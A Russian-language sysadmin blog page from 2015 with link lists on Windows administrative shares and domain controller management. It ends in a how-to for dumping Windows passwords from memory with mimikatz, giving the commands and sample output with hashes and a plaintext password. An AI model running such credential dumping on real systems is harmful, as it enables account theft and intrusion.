March 20th, 2015

Создание и удаление скрытых и административных общих ресурсов на клиентских компьютерах

Microsoft: https://support.microsoft.com/ru-ru/kb/314984

Staffcop: http://www.staffcop.ru/faq/install/open_admin_res.html

В данной статье приведены пошаговые инструкции по созданию и удалению скрытых и административных общих ресурсов на компьютерах под управлением Microsoft Windows XP Professional, Windows 2000 Professional и Windows NT 4.0 Workstation. Подходит и для более новых версий Windows.
Collapse )

Переименование контроллера домена

Переименование контроллера домена

https://msdn.microsoft.com/ru-ru/library/cc782761(v=ws.10).aspx

Переименование контроллеров домена

https://msdn.microsoft.com/ru-ru/library/cc740045(v=ws.10).aspx

Функциональность домена и леса

https://msdn.microsoft.com/ru-ru/library/cc738670(v=ws.10).aspx

Инструкции по установке и обновлению операционной системы

https://msdn.microsoft.com/ru-ru/library/cc759330(v=ws.10).aspx

Создание дополнительного контроллера домена

https://msdn.microsoft.com/ru-ru/library/cc781792(v=ws.10).aspx

Включение или отключение глобального каталога

https://msdn.microsoft.com/ru-ru/library/cc758330(v=ws.10).aspx

Передача ролей хозяина операций

https://msdn.microsoft.com/ru-ru/library/cc740017(v=ws.10).aspx

Понижение роли контроллера домена

https://msdn.microsoft.com/ru-ru/library/cc740017(v=ws.10).aspx

Протокол доступа к каталогам

https://msdn.microsoft.com/ru-ru/library/cc737317(v=ws.10).aspx

Архивация данных состояния системы

https://msdn.microsoft.com/ru-ru/library/cc781353(v=ws.10).aspx

Как извлечь пароли пользователей Windows из памяти

Идея описана в статье: Идея: Извлечь пароли пользователей Windows из памяти

Программы для решения задачи:

Утилита Windows Credentials Editor – одно из наиболее известных и универсальных решений.
Но по мне ... недостаточно универсальное. И даже сложное. Конечно, антивирусы от Microsoft распознают WCE как вредоносную программу, да только кто ж их слушает...

О самой программе и ее возможностях можно узнать по ссылке:
Windows Credentials Editor (WCE) F.A.Q.

Мне, все-таки, больше понравилась другая программа, как по скорости, так и по функционалу - ввел две команды и готово:

mimikatz - как сказали авторы обзора - "совершенно убойная наработка" французских исследователей, описанная в вышеуказанной статье, вынесенной в заголовок.
Всецело согласен. Убойная.

Mimikatz

Итак. Стартовая страница программы - Blog de Gentil Kiwi

Нас интересует исполняемый файл:
◾ binaires : https://github.com/gentilkiwi/mimikatz/releases/latest

После распаковки архива, который существует в двух вариантах - для x86 и x64 Windows - запускаем командную строку от имени администратора.

Синтаксис:

mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/


Вот и все: Password действительно проверялся и в домене и в рабочей группе. Совпадает.

Перейти к Оглавлению